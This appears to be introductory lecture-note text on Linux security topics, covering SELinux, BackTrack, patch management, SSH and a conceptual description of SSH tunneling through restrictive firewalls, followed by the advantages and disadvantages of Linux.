Security Enhanced Linux (SELinux)  Security Enhanced Linux(SELinux) is a Linux feature that provides a mechanism for supporting access control security policies  SELinux is a not a separate distribution in itself but a set of modifications which are applied to Linux Kernel to make it more secure.  SELinux has been integrated into version 2.6 series of Linux Kernel and separate patches are now unnecessary. Backtrack  BackTrack is a Linux distribution as the world‘s most popular security distribution for penetration testing and vulnerability assessment.  The BackTrack distribution originated from the merger of two formerely competing distributions which focused on penetration testing.  WHAX: a SLAX based Linux distribution.  Auditor Security Collection: a Live CD based on Knoppix.  The overlap with Auditor and WHAX in purpose tools collection partly led to merger. Patch Management  Patch Management is a part of the job role of system administrator. The task involves applying and Testing multiple patches on the available computer systems. Patch Management tasks include  Maintaining the set of available patches from the vendor  Deciding what patches necessary to apply first on the their nature as critical or optional  Ensuring that patches are successfully installed  And testing the system for stability after installation  There are lot of automated tools available in the market to automate this process including the RingMaster‘s Automated Patch Management and Gilbrator‘s Everguard. SSH Connection  SSH is a protocol which enables remote administration of computers over encrypted connections. An SSH client is used to log in to remote machine and allows the execution of commands on that machine.  RSH and Telnet also allow remote administration of computers in a similar way like SSH but these protocols are insecure and transfer data in plain text over the network.  SSH and Openssh for Linux and putty for windows can be used as a SSH client, to communicate with SSH server. SSH Tunneling  SSH Tunneling can be used to bypass the security restriction imposed by a proxy server and firewall on a network. During tunneling the SSH client would be used to send the data meant

for other protocols such as SMB or HTTP.  For SSH tunneling we will be requiring two machines. One inside the restricted network and the other outside the network. The system outside the restricted network should be configured as a server and the system inside the restricted network should be configured as SSH client.  Eg We have a situation where port 22 is open in restricted network and all the other services like FTP, HTTP & SMTP are blocked. Here in this scenario we can use SSH tunneling to browse the normal internet by using a SSH server as a proxy which fetches the web pages for my client and send me the data wrapped in SSH protocol which is allowed in the network.  SSH Tunneling can also be used to transfer unencrypted network traffic between the SSH client and Server. Advantages of Linux  COST- Being a open source project as it comes under GNU general public license. Cost is the major factor why Linux is used in more than 80% servers throughout the world.  SECURITY- Linux is also considered as more secure application than windows as most of the malware actually target windows based computers. Linux has better user permissions model which makes it more secure.  STABILITY- Linux is quite stable in comparison to windows. Disadvantages of Linux  Due to being open source, Linux source code or its associated applications source codes are easily available which makes it easier to discover security vulnerabilities and flaw. They can be exploited in the wild by the hackers.  HARDWARE COMPATIBILITY ISSUE- Linux does not support latest hardware in some cases due to which it becomes very uncomfortable for a normal desktop user to use Linux as a main OS over windows.  Linux is not very easy to use for normal people as it requires extensive knowledge of operating and networking to use it comfortably. So, it can be a bit Hassle for a non technical person.

Sign up to vote on this title
UsefulNot useful